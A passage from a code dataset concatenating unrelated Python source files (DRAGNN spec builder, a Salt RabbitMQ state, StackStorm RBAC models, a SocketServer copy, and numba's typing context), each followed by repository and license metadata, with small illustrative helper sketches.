value=';'.join(['' for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_embedding_names',
value=';'.join([x.name for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_transition_system',
value=self.spec.transition_system.registered_name)
# Propagate information from SyntaxNet C++ backends into the DRAGNN
# self.spec.
with tf.Session(tf_master) as sess:
feature_sizes, domain_sizes, _, num_actions = sess.run(
gen_parser_ops.feature_size(task_context_str=str(context)))
self.spec.num_actions = int(num_actions)
for i in xrange(len(feature_sizes)):
self.spec.fixed_feature[i].size = int(feature_sizes[i])
self.spec.fixed_feature[i].vocabulary_size = int(domain_sizes[i])
for i in xrange(len(self.spec.linked_feature)):
self.spec.linked_feature[i].size = len(
self.spec.linked_feature[i].fml.split(' '))
del self.spec.resource[:]
for resource in context.input:
self.spec.resource.add(name=resource.name).part.add(
file_pattern=resource.part[0].file_pattern)
def complete_master_spec(master_spec, lexicon_corpus, output_path,
tf_master=''):
"""Finishes a MasterSpec that defines the network config.
Given a MasterSpec that defines the DRAGNN architecture, completes the spec so
that it can be used to build a DRAGNN graph and run training/inference.
Args:
master_spec: MasterSpec.
lexicon_corpus: the corpus to be used with the LexiconBuilder.
output_path: directory to save resources to.
tf_master: TensorFlow master executor (string, defaults to '' to use the
local instance).
Returns:
None, since the spec is changed in-place.
"""
if lexicon_corpus:
lexicon.build_lexicon(output_path, lexicon_corpus)
# Use Syntaxnet builder to fill out specs.
for i, spec in enumerate(master_spec.component):
builder = ComponentSpecBuilder(spec.name)
builder.spec = spec
builder.fill_from_resources(output_path, tf_master=tf_master)
master_spec.component[i].CopyFrom(builder.spec)
def default_targets_from_spec(spec):
"""Constructs a default set of TrainTarget protos from a DRAGNN spec.
For each component in the DRAGNN spec, it adds a training target for that
component's oracle. It also stops unrolling the graph with that component. It
skips any 'shift-only' transition systems which have no oracle. E.g.: if there
  are three components, a 'shift-only', a 'tagger', and an 'arc-standard', it
will construct two training targets, one for the tagger and one for the
arc-standard parser.
Arguments:
spec: DRAGNN spec.
Returns:
List of TrainTarget protos.
"""
component_targets = [
spec_pb2.TrainTarget(
name=component.name,
max_index=idx + 1,
unroll_using_oracle=[False] * idx + [True])
for idx, component in enumerate(spec.component)
if not component.transition_system.registered_name.endswith('shift-only')
]
return component_targets
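

# --- Illustrative sketch (editor's addition, not part of the original DRAGNN code) ---
# default_targets_from_spec() above builds, for each trainable component, an unroll
# mask of length idx + 1 whose final entry is True. The dependency-free sketch below
# mimics that bookkeeping with plain dicts instead of spec_pb2.TrainTarget protos, so
# the shape of the masks can be inspected without a SyntaxNet/DRAGNN installation.
def _sketch_default_targets(component_names):
  """Returns dicts shaped like TrainTarget protos for the given component names."""
  targets = []
  for idx, name in enumerate(component_names):
    if name.endswith('shift-only'):
      continue  # Components without an oracle get no training target.
    targets.append({
        'name': name,
        'max_index': idx + 1,
        'unroll_using_oracle': [False] * idx + [True],
    })
  return targets


# Example: three components produce two targets, mirroring the docstring above:
#   _sketch_default_targets(['shift-only', 'tagger', 'arc-standard'])
#   -> [{'name': 'tagger', 'max_index': 2, 'unroll_using_oracle': [False, True]},
#       {'name': 'arc-standard', 'max_index': 3,
#        'unroll_using_oracle': [False, False, True]}]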
|
cshallue/models
|
research/syntaxnet/dragnn/python/spec_builder.py
|
Python
|
apache-2.0
| 12,239
|
# -*- coding: utf-8 -*-
'''
Manage RabbitMQ Clusters
========================
Example:
.. code-block:: yaml
rabbit@rabbit.example.com:
rabbitmq_cluster.join:
- user: rabbit
- host: rabbit.example.com
'''
from __future__ import absolute_import
# Import python libs
import logging
# Import salt libs
import salt.utils
log = logging.getLogger(__name__)
def __virtual__():
'''
Only load if RabbitMQ is installed.
'''
return salt.utils.which('rabbitmqctl') is not None
def joined(name, host, user='rabbit', ram_node=None, runas='root'):
'''
    Ensure the current node has joined the cluster with node user@host
name
Irrelevant, not used (recommended: user@host)
user
        The user of the node to join to (default: rabbit)
host
        The host of the node to join to
ram_node
Join node as a RAM node
runas
The user to run the rabbitmq command as
'''
ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
status = __salt__['rabbitmq.cluster_status']()
if '{0}@{1}'.format(user, host) in status:
ret['comment'] = 'Already in cluster'
return ret
if not __opts__['test']:
result = __salt__['rabbitmq.join_cluster'](host,
user,
ram_node,
runas=runas)
if 'Error' in result:
ret['result'] = False
ret['comment'] = result['Error']
return ret
elif 'Join' in result:
ret['comment'] = result['Join']
# If we've reached this far before returning, we have changes.
ret['changes'] = {'old': '', 'new': '{0}@{1}'.format(user, host)}
if __opts__['test']:
ret['result'] = None
ret['comment'] = 'Node is set to join cluster {0}@{1}'.format(
user, host)
return ret
# Alias join to preserve backward compat
join = salt.utils.alias_function(joined, 'join')
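

# --- Illustrative sketch (editor's addition, not part of the upstream Salt state) ---
# Salt injects the __salt__ and __opts__ dunder dictionaries into state modules at
# runtime. A minimal way to exercise joined() outside of a Salt run is to patch those
# globals by hand; the execution-module names below ('rabbitmq.cluster_status',
# 'rabbitmq.join_cluster') match the calls made above, but the stubbed return values
# and the test-mode setting are assumptions chosen for illustration only.
def _sketch_run_joined_in_test_mode():
    globals()['__salt__'] = {
        'rabbitmq.cluster_status': lambda: [],
        'rabbitmq.join_cluster': lambda host, user, ram_node, runas=None: {'Join': 'ok'},
    }
    globals()['__opts__'] = {'test': True}
    # In test mode the state reports the pending change without touching the cluster:
    # result is None and changes show the node that would be joined.
    return joined('rabbit@rabbit.example.com', 'rabbit.example.com')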
|
smallyear/linuxLearn
|
salt/salt/states/rabbitmq_cluster.py
|
Python
|
apache-2.0
| 2,051
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from st2client.models import core
__all__ = ["Role", "UserRoleAssignment"]
class Role(core.Resource):
_alias = "role"
_display_name = "Role"
_plural = "Roles"
_plural_display_name = "Roles"
_repr_attributes = ["id", "name", "system"]
_url_path = "rbac/roles"
class UserRoleAssignment(core.Resource):
_alias = "role-assignment"
_display_name = "Role Assignment"
_plural = "RoleAssignments"
_plural_display_name = "Role Assignments"
_repr_attributes = ["id", "role", "user", "is_remote"]
_url_path = "rbac/role_assignments"
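

# --- Illustrative sketch (editor's addition, not part of st2client) ---
# New RBAC-style resources follow the same declarative pattern: class attributes
# describe the CLI alias, display names, repr fields, and API URL path consumed by
# st2client's generic resource machinery. The class below is hypothetical and only
# illustrates the convention; no such endpoint exists in StackStorm.
class ExampleRoleGrant(core.Resource):
    _alias = "role-grant"
    _display_name = "Role Grant"
    _plural = "RoleGrants"
    _plural_display_name = "Role Grants"
    _repr_attributes = ["id", "role", "grantee"]
    _url_path = "rbac/role_grants"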
|
StackStorm/st2
|
st2client/st2client/models/rbac.py
|
Python
|
apache-2.0
| 1,243
|
"""Generic socket server classes.
This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
        - others, e.g. AF_DECNET, are conceivable (see <socket.h>)
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but it
saves some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to prevent two requests that come in nearly simultaneously from
applying conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use select() to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
- Standard framework for select-based multiplexing
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 Luke Kenneth Casson Leighton <lkcl@samba.org>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
  Each entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: Luke Kenneth Casson Leighton
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import _pydev_socket as socket
import _pydev_select as select
import sys
import os
try:
import _pydev_threading as threading
except ImportError:
import dummy_threading as threading
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
"ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
"StreamRequestHandler","DatagramRequestHandler",
"ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer","UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__shutdown_request = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__is_shut_down.clear()
try:
while not self.__shutdown_request:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = select.select([self], [], [], poll_interval)
if self in r:
self._handle_request_noblock()
finally:
self.__shutdown_request = False
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__shutdown_request = True
self.__is_shut_down.wait()
# The distinction between handling, getting, processing and
# finishing a request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls
# select, get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process
# or create a new thread to finish the request
# - finish_request() instantiates the request handler class;
# this constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.shutdown_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
self.server_bind()
self.server_activate()
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by select().
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
try:
#explicitly shutdown. socket.close() merely releases
#the socket and waits for GC to perform the actual close.
request.shutdown(socket.SHUT_WR)
except socket.error:
pass #some platforms may raise ENOTCONN here
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
class UDPServer(TCPServer):
"""UDP server class."""
allow_reuse_address = False
socket_type = socket.SOCK_DGRAM
max_packet_size = 8192
def get_request(self):
data, client_addr = self.socket.recvfrom(self.max_packet_size)
return (data, self.socket), client_addr
def server_activate(self):
# No need to call listen() for UDP.
pass
def shutdown_request(self, request):
# No need to shutdown anything.
self.close_request(request)
def close_request(self, request):
# No need to close anything.
pass
class ForkingMixIn:
"""Mix-in class to handle each request in a new process."""
timeout = 300
active_children = None
max_children = 40
def collect_children(self):
"""Internal routine to wait for children that have exited."""
if self.active_children is None: return
while len(self.active_children) >= self.max_children:
# XXX: This will wait for any child process, not just ones
# spawned by this library. This could confuse other
# libraries that expect to be able to wait for their own
# children.
try:
pid, status = os.waitpid(0, 0)
except os.error:
pid = None
if pid not in self.active_children: continue
self.active_children.remove(pid)
# XXX: This loop runs more system calls than it ought
# to. There should be a way to put the active_children into a
# process group and then use os.waitpid(-pgid) to wait for any
# of that set, but I couldn't find a way to allocate pgids
# that couldn't collide.
for child in self.active_children:
try:
pid, status = os.waitpid(child, os.WNOHANG)
except os.error:
pid = None
if not pid: continue
try:
self.active_children.remove(pid)
except ValueError, e:
raise ValueError('%s. x=%d and list=%r' % (e.message, pid,
self.active_children))
def handle_timeout(self):
"""Wait for zombies after self.timeout seconds of inactivity.
May be extended, do not override.
"""
self.collect_children()
def process_request(self, request, client_address):
"""Fork a new subprocess to process the request."""
self.collect_children()
pid = os.fork()
if pid:
# Parent process
if self.active_children is None:
self.active_children = []
self.active_children.append(pid)
self.close_request(request) #close handle in parent process
return
else:
# Child process.
# This must never return, hence os._exit()!
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
os._exit(0)
except:
try:
self.handle_error(request, client_address)
self.shutdown_request(request)
finally:
os._exit(1)
class ThreadingMixIn:
"""Mix-in class to handle each request in a new thread."""
# Decides how threads will act upon termination of the
# main process
daemon_threads = False
def process_request_thread(self, request, client_address):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
"""Start a new thread to process the request."""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.start()
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
if hasattr(socket, 'AF_UNIX'):
class UnixStreamServer(TCPServer):
address_family = socket.AF_UNIX
class UnixDatagramServer(UDPServer):
address_family = socket.AF_UNIX
class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
"""Base class for request handler classes.
This class is instantiated for each request to be handled. The
constructor sets the instance variables request, client_address
and server, and then calls the handle() method. To implement a
specific service, all you need to do is to derive a class which
defines a handle() method.
The handle() method can find the request as self.request, the
client address as self.client_address, and the server (in case it
needs access to per-server information) as self.server. Since a
separate instance is created for each request, the handle() method
    can define arbitrary other instance variables.
"""
def __init__(self, request, client_address, server):
self.request = request
self.client_address = client_address
self.server = server
self.setup()
try:
self.handle()
finally:
self.finish()
def setup(self):
pass
def handle(self):
pass
def finish(self):
pass
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
"""Define self.rfile and self.wfile for stream sockets."""
# Default buffer sizes for rfile, wfile.
# We default rfile to buffered because otherwise it could be
# really slow for large data (a getc() call per byte); we make
# wfile unbuffered because (a) often after a write() we want to
# read and we need to flush the line; (b) big writes to unbuffered
# files are typically optimized by stdio even when big reads
# aren't.
rbufsize = -1
wbufsize = 0
# A timeout to apply to the request socket, if not None.
timeout = None
# Disable nagle algorithm for this socket, if True.
# Use only when wbufsize != 0, to avoid small packets.
disable_nagle_algorithm = False
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, True)
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
def finish(self):
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
self.rfile.close()
class DatagramRequestHandler(BaseRequestHandler):
# XXX Regrettably, I cannot get this working on Linux;
# s.recvfrom() doesn't return a meaningful client address.
"""Define self.rfile and self.wfile for datagram sockets."""
def setup(self):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
self.packet, self.socket = self.request
self.rfile = StringIO(self.packet)
self.wfile = StringIO()
def finish(self):
self.socket.sendto(self.wfile.getvalue(), self.client_address)
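

# --- Illustrative sketch (editor's addition, not part of the original module) ---
# As the module docstring explains, a service is implemented by deriving from
# BaseRequestHandler (here via StreamRequestHandler) and overriding handle(). The
# minimal line-echo TCP service below uses only classes defined in this file; the
# host and port values are arbitrary examples.
class _ExampleEchoHandler(StreamRequestHandler):
    """Echo every received line back to the client, prefixed with 'echo: '."""
    def handle(self):
        for line in self.rfile:
            self.wfile.write('echo: ' + line)

def _example_serve_echo(host='127.0.0.1', port=8007):
    """Serve _ExampleEchoHandler with one thread per connection until interrupted."""
    server = ThreadingTCPServer((host, port), _ExampleEchoHandler)
    try:
        server.serve_forever()
    finally:
        server.server_close()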
|
akiokio/centralfitestoque
|
src/.pycharm_helpers/pydev/_pydev_SocketServer.py
|
Python
|
bsd-2-clause
| 23,375
|
from collections import defaultdict
from collections.abc import Sequence
import types as pytypes
import weakref
import threading
import contextlib
import operator
import numba
from numba.core import types, errors
from numba.core.typeconv import Conversion, rules
from numba.core.typing import templates
from numba.core.utils import order_by_target_specificity
from .typeof import typeof, Purpose
from numba.core import utils
class Rating(object):
__slots__ = 'promote', 'safe_convert', "unsafe_convert"
def __init__(self):
self.promote = 0
self.safe_convert = 0
self.unsafe_convert = 0
    def astuple(self):
        """Returns a tuple suitable for comparison, with the worst situation
        first.
"""
return (self.unsafe_convert, self.safe_convert, self.promote)
def __add__(self, other):
if type(self) is not type(other):
return NotImplemented
rsum = Rating()
rsum.promote = self.promote + other.promote
rsum.safe_convert = self.safe_convert + other.safe_convert
rsum.unsafe_convert = self.unsafe_convert + other.unsafe_convert
return rsum
class CallStack(Sequence):
"""
A compile-time call stack
"""
def __init__(self):
self._stack = []
self._lock = threading.RLock()
def __getitem__(self, index):
"""
        Returns the item in the stack, where index=0 is the top and index=1 is
        the second item from the top.
"""
return self._stack[len(self) - index - 1]
def __len__(self):
return len(self._stack)
@contextlib.contextmanager
def register(self, target, typeinfer, func_id, args):
        # guard against compiling the same function with the same signature
if self.match(func_id.func, args):
msg = "compiler re-entrant to the same function signature"
raise errors.NumbaRuntimeError(msg)
self._lock.acquire()
self._stack.append(CallFrame(target, typeinfer, func_id, args))
try:
yield
finally:
self._stack.pop()
self._lock.release()
def finditer(self, py_func):
"""
Yields frame that matches the function object starting from the top
of stack.
"""
for frame in self:
if frame.func_id.func is py_func:
yield frame
def findfirst(self, py_func):
"""
Returns the first result from `.finditer(py_func)`; or None if no match.
"""
try:
return next(self.finditer(py_func))
except StopIteration:
return
def match(self, py_func, args):
"""
        Returns the first frame that matches *py_func* and the argument types
        in *args*; or None if there is no match.
"""
for frame in self.finditer(py_func):
if frame.args == args:
return frame
class CallFrame(object):
"""
A compile-time call frame
"""
def __init__(self, target, typeinfer, func_id, args):
self.typeinfer = typeinfer
self.func_id = func_id
self.args = args
self.target = target
self._inferred_retty = set()
def __repr__(self):
return "CallFrame({}, {})".format(self.func_id, self.args)
def add_return_type(self, return_type):
"""Add *return_type* to the list of inferred return-types.
If there are too many, raise `TypingError`.
"""
# The maximum limit is picked arbitrarily.
# Don't think that this needs to be user configurable.
RETTY_LIMIT = 16
self._inferred_retty.add(return_type)
if len(self._inferred_retty) >= RETTY_LIMIT:
m = "Return type of recursive function does not converge"
raise errors.TypingError(m)
class BaseContext(object):
    """A typing context for storing function typing constraint templates.
"""
def __init__(self):
# A list of installed registries
self._registries = {}
# Typing declarations extracted from the registries or other sources
self._functions = defaultdict(list)
self._attributes = defaultdict(list)
self._globals = utils.UniqueDict()
self.tm = rules.default_type_manager
self.callstack = CallStack()
# Initialize
self.init()
def init(self):
"""
Initialize the typing context. Can be overridden by subclasses.
"""
def refresh(self):
"""
Refresh context with new declarations from known registries.
Useful for third-party extensions.
"""
self.load_additional_registries()
# Some extensions may have augmented the builtin registry
self._load_builtins()
def explain_function_type(self, func):
"""
Returns a string description of the type of a function
"""
desc = []
defns = []
param = False
if isinstance(func, types.Callable):
sigs, param = func.get_call_signatures()
defns.extend(sigs)
elif func in self._functions:
for tpl in self._functions[func]:
param = param or hasattr(tpl, 'generic')
defns.extend(getattr(tpl, 'cases', []))
else:
msg = "No type info available for {func!r} as a callable."
desc.append(msg.format(func=func))
if defns:
desc = ['Known signatures:']
for sig in defns:
desc.append(' * {0}'.format(sig))
return '\n'.join(desc)
def resolve_function_type(self, func, args, kws):
"""
Resolve function type *func* for argument types *args* and *kws*.
A signature is returned.
"""
# Prefer user definition first
try:
res = self._resolve_user_function_type(func, args, kws)
except errors.TypingError as e:
# Capture any typing error
last_exception = e
res = None
else:
last_exception = None
        # Return early if we know there's a working user function
if res is not None:
return res
# Check builtin functions
res = self._resolve_builtin_function_type(func, args, kws)
# Re-raise last_exception if no function type has been found
if res is None and last_exception is not None:
raise last_exception
return res
def _resolve_builtin_function_type(self, func, args, kws):
# NOTE: we should reduce usage of this
if func in self._functions:
# Note: Duplicating code with types.Function.get_call_type().
# *defns* are CallTemplates.
defns = self._functions[func]
for defn in defns:
for support_literals in [True, False]:
if support_literals:
res = defn.apply(args, kws)
else:
fixedargs = [types.unliteral(a) for a in args]
res = defn.apply(fixedargs, kws)
if res is not None:
return res
def _resolve_user_function_type(self, func, args, kws, literals=None):
# It's not a known function type, perhaps it's a global?
functy = self._lookup_global(func)
if functy is not None:
func = functy
if isinstance(func, types.Type):
# If it's a type, it may support a __call__ method
func_type = self.resolve_getattr(func, "__call__")
if func_type is not None:
# The function has a __call__ method, type its call.
return self.resolve_function_type(func_type, args, kws)
if isinstance(func, types.Callable):
# XXX fold this into the __call__ attribute logic?
return func.get_call_type(self, args, kws)
def _get_attribute_templates(self, typ):
"""
Get matching AttributeTemplates for the Numba type.
"""
if typ in self._attributes:
for attrinfo in self._attributes[typ]:
yield attrinfo
else:
for cls in type(typ).__mro__:
if cls in self._attributes:
for attrinfo in self._attributes[cls]:
yield attrinfo
def resolve_getattr(self, typ, attr):
"""
Resolve getting the attribute *attr* (a string) on the Numba type.
The attribute's type is returned, or None if resolution failed.
"""
def core(typ):
out = self.find_matching_getattr_template(typ, attr)
if out:
return out['return_type']
out = core(typ)
if out is not None:
return out
# Try again without literals
out = core(types.unliteral(typ))
if out is not None:
return out
if isinstance(typ, types.Module):
attrty = self.resolve_module_constants(typ, attr)
if attrty is not None:
return attrty
def find_matching_getattr_template(self, typ, attr):
templates = list(self._get_attribute_templates(typ))
# get the order in which to try templates
from numba.core.target_extension import get_local_target # circular
target_hw = get_local_target(self)
order = order_by_target_specificity(target_hw, templates, fnkey=attr)
for template in order:
return_type = template.resolve(typ, attr)
if return_type is not None:
return {
'template': template,
'return_type': return_type,
}
def resolve_setattr(self, target, attr, value):
"""
Resolve setting the attribute *attr* (a string) on the *target* type
to the given *value* type.
A function signature is returned, or None if resolution failed.
"""
for attrinfo in self._get_attribute_templates(target):
expectedty = attrinfo.resolve(target, attr)
# NOTE: convertibility from *value* to *expectedty* is left to
# the caller.
if expectedty is not None:
return templates.signature(types.void, target, expectedty)
def resolve_static_getitem(self, value, index):
assert not isinstance(index, types.Type), index
args = value, index
kws = ()
return self.resolve_function_type("static_getitem", args, kws)
def resolve_static_setitem(self, target, index, value):
assert not isinstance(index, types.Type), index
args = target, index, value
kws = {}
return self.resolve_function_type("static_setitem", args, kws)
def resolve_setitem(self, target, index, value):
assert isinstance(index, types.Type), index
fnty = self.resolve_value_type(operator.setitem)
sig = fnty.get_call_type(self, (target, index, value), {})
return sig
def resolve_delitem(self, target, index):
args = target, index
kws = {}
fnty = self.resolve_value_type(operator.delitem)
sig = fnty.get_call_type(self, args, kws)
return sig
def resolve_module_constants(self, typ, attr):
"""
Resolve module-level global constants.
Return None or the attribute type
"""
assert isinstance(typ, types.Module)
attrval = getattr(typ.pymod, attr)
try:
return self.resolve_value_type(attrval)
except ValueError:
pass
def resolve_argument_type(self, val):
"""
Return the numba type of a Python value that is being used
as a function argument. Integer types will all be considered
int64, regardless of size.
ValueError is raised for unsupported types.
"""
try:
return typeof(val, Purpose.argument)
except ValueError:
if numba.cuda.is_cuda_array(val):
# There's no need to synchronize on a stream when we're only
# determining typing - synchronization happens at launch time,
# so eliding sync here is safe.
return typeof(numba.cuda.as_cuda_array(val, sync=False),
Purpose.argument)
else:
raise
def resolve_value_type(self, val):
"""
Return the numba type of a Python value that is being used
as a runtime constant.
ValueError is raised for unsupported types.
"""
try:
